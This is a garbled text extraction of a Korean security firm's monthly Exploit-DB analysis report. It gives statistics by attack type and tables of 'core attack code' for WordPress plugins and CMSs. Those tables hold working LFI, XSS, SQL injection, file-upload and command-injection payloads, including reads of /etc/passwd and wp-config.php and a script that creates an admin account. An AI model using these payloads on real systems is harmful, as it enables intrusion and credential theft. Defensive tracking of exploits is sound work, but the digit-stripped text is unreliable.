76 XSS 하 Huge-IT Slider admin.php XSS

Size: px

Start display at page:

Download "76 XSS 하 Huge-IT Slider admin.php XSS"

득희 수
5 years ago
Views:

1 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (05.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 05 년 6 월에공개된 Exploit-DB 의분석결과, LFI 공격에대한보고개수가가장많았습니다. LFI 공격은대체적으로공격난이도는낮지만공격이성공했을경우시스템의주요파일들이노출되거나파일다운로드가가능해지기때문에위험도가높은공격으로분류됩니다. LFI 공격및 Directory Traversal 이성공하는이유는사용자의입력값을추가적인보안조치없이그대로시스템에서사용하기때문입니다. 이를응용하여다른공격시도가많이발생할수있으므로관리자는사용자입력값을시스템에서그대로사용하는것을최대한방지하여야됩니다. 이번달주요소프트웨어별발생현황에서는지난달에이어 Wordpress 에대한보고개수가가장많은것으로확인되었으며공격종류도다양한것으로분석되었습니다. Plugin 에대한대대적인업데이트가필요해보입니다.. 별보고개수 보고개수 LFI XSS 0 SQL 9 File Upload Command RFI Directory Traversal 총합계 LFI XSS SQL 9 별보고개수 File Upload Command RFI Directory Traversal 8 총합계. 위험도별분류위험도 보고개수 백분율 상 5.% 86.8% 하 0 0.0% 합계 8 00% 위험도별분류 5 상. 공격난이도별현황공격난이도 보고개수 백분율 상 7.9% 5.% 하 86.8% 총합계 8 00% 공격난이도별현황 상 하 4. 주요소프트웨어별발생현황소프트웨어이름 Vfront ZCMS Novius Pasworld TYPO BlackCat Vesta Control Panel Thycotic WedgeOS 총합계 보고개수 8 주요소프트웨어별발생현황 Vfront ZCMS Novius Pasworld TYPO BlackCat ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 78 SQL 하 LeagueManager.9. Plugin - / SQL 700 LFI 하 zm Ajax Login & Register Plugin admin-ajax.php LFI 75 File Upload 하 상 Nmedia Member Conversation Plugin doupload.php File Upload 709 LFI 하 Really Simple Guest Post - simple-guest-post-submit.php LFI 744 LFI 하 Plugin 'WP Mobile Edition' css.php LFI 74 mmand Inject 하 Wp-ImageZoom - div_img.php Command 764 XSS 하 Encrypted Contact Form Plugin options-general.php XSS 75 LFI 하 RobotCPA Plugin V5 - f.php SQL 754 LFI 하 History Collection - download.php LFI 775 File Upload 하 상 Aviary Image Editor Add On For Gravity Forms.0 - upload.php File Upload 774 LFI 하 SE HTML5 Album Audio Player..0 - download_audio.php LFI

2 76 XSS 하 Huge-IT Slider admin.php XSS

3 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL 하 XSS 하 XSS 하 XSS 하 LFI 하 EDB 분석보고서 (05.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. LeagueManager.9. Plugin - / SQL VFront variabili.php XSS VFront log.php XSS VFront query_editor.php XSS zm Ajax Login & Register Plugin adminajax.php LFI /?match=%0and%099=99 /vfront-0.99./vfront /admin/variabili.php?feed=0&gidfocus=0 Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database. "/><script>alert(666)</script> /vfront-0.99./vfront /admin/log.php?op="/><script>var xhr%dnew XMLHttpRequest();xhr.onreadystatechange%dfunction(){ if(xhr.status%d%d00){if(xhr.readystate%d%d4){al ert(xhr.responsetext);}}};xhr.open('post','utenze.db.php?i nsert_new',true);xhr.setrequestheader('contenttype','application/x-www-formurlencoded');xhr.send('nome%dhyprlinxe%6cognome %dapparitionsec%6 %dx@x.com%6passwd% dhacked%6passwd%dhacked');</script>&tabella=&ui d=&data_dal=all&data_al=all /vfront-0.99./vfront /admin/query_editor.php?id=&id_table=&id_campo ="/><script>alert(666)</script> POST /wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 action=load_template&template=../etc/passwd LeagueManag er.9. Plugin Vfront VFront Vfront VFront Vfront VFront zm Ajax Login & Register Plugin File Upload 하상 Nmedia Member Conversation Plugin doupload.php File Upload POST /wordpress/wp-content/plugins/wordpress-memberprivate-conversation/doupload.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f dd009908f Content-Disposition: form-data; name="filedata"; filename="lo.php" Content-Type: application/octet-stream Nmedia Member Conversation Plugin.5.0 <? phpinfo();?> dd009908f LFI 하 Really Simple Guest Post - simple-guest-postsubmit.php LFI POST /wp-content/plugins/really-simple-guest-post/simpleguest-post-submit.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 Really Simple Guest Post rootpath=/etc/passwd SQL 하 LFI 하 Pasworld - detail.php SQL Plugin 'WP Mobile Edition' css.php LFI /detail.php?id=%0and%0=-- /wp-content/themes/mtheme- Unus/css/css.php?files=../../../../wp-config.php Pasworld Pasworld All Versions Plugin 'WP Mobile Edition' Command SQL 하 하 Wp-ImageZoom - div_img.php Command /wp-content/plugins/wpimagezoom/div_img.php?cmd=delall Clone Script.0 - /milw0rm/related.php?program=lol' AND (SELECT * related.php SQL FROM (SELECT(SLEEP(5)))yYCj) AND 'mqub'='mqub Wp- ImageZoom..0 Clone Script XSS 하 Encrypted Contact Form Plugin optionsgeneral.php XSS POST /wp-admin/options-general.php?page=conformconf HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 Encrypted Contact Form Plugin.0.4 iframe_url="></iframe><script>alert('xss!');</script>

4 EDB 분석보고서 (05.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 LFI 하.6 - // LFI POST /wp-admin/options-general.php?page=conformconf HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 Cookie: lang=../../../../../../../etc/passwd% Directory Traversal SQL 상 하 /bonita/portal/ Directory Traversal.0.5.4p6 - show_sys_state.php SQL /bonita/portal/themeresource?theme=portal/../../../../../../../../../../../../../../../../&location=windows/system.ini /monitor/show_sys_state.php?state=server&server=- %0UNION%0SELECT%0,version%8%9%0-- % p LFI 하 RobotCPA Plugin V5 - f.php SQL /wpcontent/plugins/robotcpa/f.php?l=cghwoi8vzmlsdgvylj lc9cmnlps4vli4vli4vli4vdaty9uzmlnlnboca== RobotCPA Plugin V LFI 하 RFI 하 History Collection - download.php LFI login.jsp RFI /wordpress/wp-content/plugins/historycollection/download.php?var=../../../wp-config.php /bonita/login.jsp?_l=en&redirecturl=//immuniweb.com/ History Collection <= File Upload 하상 Aviary Image Editor Add On For Gravity Forms.0 - upload.php File Upload POST /wp-content/plugins/aviary-image-editor-add-on-forgravity-forms/includes/upload.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f dd009908f Content-Disposition: form-data; name="filedata"; filename="shell.php" Content-Type: application/octet-stream Aviary Image Editor Add On For Gravity Forms.0 <? phpinfo();?> dd009908f LFI 하 SQL 하 SE HTML5 Album Audio Player..0 - download_audio.php LFI ZCMS. - /ZCMS_./ SQL /wp-content/plugins/se-html5-album-audioplayer/download_audio.php?file=/wpcontent/uploads/../../../../../etc/passwd POST /ZCMS_./ZCMS_./?dir=login HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 SE HTML5 Album Audio Player..0 ZCMS ZCMS. username=admin&pass=hell' OR ''=' XSS 하 ZCMS. - /ZCMS_./ XSS /ZCMS_./ZCMS_./?dir=editpost&p=&title="<script>a lert()</script>&content=<script>alert()</script>&author= <script>alert()</script>satan&visibility=&type=&comm = XSS 하 ZCMS. - index.jsp XSS /ZCMS_./ZCMS_./index.jsp?dir=editpost&p=&autho r=<script>alert(666)</script> XSS 하 POST /kilrizzy--cms-f7464/kilrizzy--cmsf7464/index.php/system/settings HTTP/. CMS - /kilrizzy-- User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 CMS-f7464/kilrizzy-- CMSf7464/index.php/system/setti Chrome/ Safari/55.7 ngs XSS ZCMS ZCMS. ZCMS ZCMS. CMS f7464 from_name=<script>alert(666)</script> LFI 하 CMS - /kilrizzy-- CMS-f7464/kilrizzy-- CMSf7464/index.php/connector LFI /kilrizzy--cms-f7464/kilrizzy--cmsf7464/index.php/connector$url=../../../../../../xampp/ph pinfo.php CMS f SQL 상상 /typoconf/ext/sb_akronymmanager/mod/index.php? TYPO Akronymmanager id=79%7%0union%0select%0(select%0gro Extension index.php SQL up_concat(username,%7:%7,password) %0FROM%0be_users),%0--%0 TYPO TYPO Akronymman ager Extension LFI 하 BlackCat CMS.. - logs.php LFI /blackcat/modules/blackcat/widgets/logs.php?dl=../config. php BlackCat BlackCat CMS..

5 EDB 분석보고서 (05.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 Command 상 Vesta Control Panel index.php Command /list/backup/index.php?backup=%7%0 %0 echo 'V0VCXNZURFTXxzOjc6ImFwYWNoZTIiOdFQl9SRJPV VBTfHM6ODoiddLWRhdGEiOdFQl9QTJUfHM6NDoiO DA4MCI7V0VCXNTTHxzOjc6ImvZF9zcwiOdFQl9TU0x fue9svhxzojq6ijg0ndmiobsthzxnzurftxxzoju6i m5naw54ijtquk9ywv9qtjufhm6mjoiodaiobsthzx NTTF9QTJUfHM6MzoiNDQzIjtGVFBfUlTVEVNfHM6Njoi dnnmdhbkijtnqulmxnzurftxxzoju6imv4aw00ijtjtu FQXNZURFTXxzOjc6ImRvdmVjbQiO0FOVElWSVJVU9 TWVNURU8czowOiIiO0FOVElTUEFNXNZURFTXxzOjA6I Vesta Control ii7rejfultvevnfhm6ntoibxlzcwwio0rou9twvnuru Panel 8czoOiJiaW5kOSI7URBVFNfUlTVEVNfHM6MTc6IndlY mfsaxplcixhdn0yxrzijtcqunlvvbfultvevnfhm6ntoi bg9jywwio0nst05fultvevnfhm6ndoiyjvbii7relts9 RVU9UQXxzOjI6Im5vIjtGSVJFV0FMTF9TWVNURU8czo4O ijpchrhymxlcyi7rklsrvdbtexfrvhuru5tsu9ofhm6odoi ZmFpbDJiYW4iOJFUE9TSVRPUll8czoOiJjbWudCI7VkVS U0lPTnxzOjU6IjAuOS44IjtMQU5HVUFHRXxzOjI6ImVuIjtsY W5ndWFnZXxzOjI6ImVuIjtcVyfHM6NToiYWRtaW4iOJ hyt8czoxmtoilxpcqvdxnlci8iow==' base64 -- decode > /tmp/sess_45%0 %0echo%0\ Vesta Control Panel File Upload 하 SimpleImageUpload - index.php File Upload POST /index.php?option=com_simpleimageupload&view=uploa d&tmpl=component&e_name=desc HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f SimpleImageU pload dd009908f Content-Disposition: form-data; name="filedata"; filename="l0v.php." Content-Type: application/octet-stream <? phpinfo();?> dd009908f SQL 상상 register.php SQL POST /genixcms/register.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/ ='and(select%0%0from%0(select%0count(*),concat(version(),floor(rand(0)*))x%0from%0informa tion_schema.tables%0group%0by%0x)a)and'&pass =cfreer&pass=cfreer&register=&token=&userid=poc-lab XSS 하 Huge-IT Slider admin.php XSS POST /wordpress/wpadmin/admin.php?page=sliders_huge_it_slider&id=&task =apply HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 Huge-IT Slider.7.5 titleimage4=%+onmouseover%dalert%8%fi0aki N_hack%F%9+a%D%& XSS 하 XSS 하 SQL 하 index.php XSS Thycotic Secret Server /SecretServer/api.ashx/simpleho me/ XSS CMS.0_.9. - rating.php SQL /-master/master/gxadmin/index.php?page=posts&q='<script>alert ('XSS By Hyprlinx')</script> /SecretServer/api.ashx/simplehome/GetSecretItemValue?s ecretitemid=<script>alert();</script>&audi taction=unmask POST //fiyocms/apps/app_article/controller/rating.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 Thycotic 0.0. Thycotic Secret Server CMS.0_.9. do=getrate&id=8;select sleep(5) --

6 EDB 분석보고서 (05.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL CMS.0_.9. - /fiyocms/user/login SQL POST /fiyocms/user/login HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/55.7 CMS.0_ LFI 하 LFI 하 RFI 하 user='%b(select(0)from(select(sleep(5)))v)%b'&pass=p oc-lab&login=login WedgeOS <= /ssgmanager/ssgimages?name=../../../../../etc/shadow /ssgmanager/ LFI Novius /novius-os /novius-os.5.0.-elche/noviusos/admin/?tab=../../../../xampp/phpinfo.php elche/novius-os/admin/ LFI Novius /novius-os elche/novius-os/admin/nos/ RFI /novius-os.5.0.-elche/noviusos/admin/nos/login?redirect= BABYSHOES.com WedgeOS WedgeOS <= Novius Novius 5.0. Novius Novius 5.0.

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.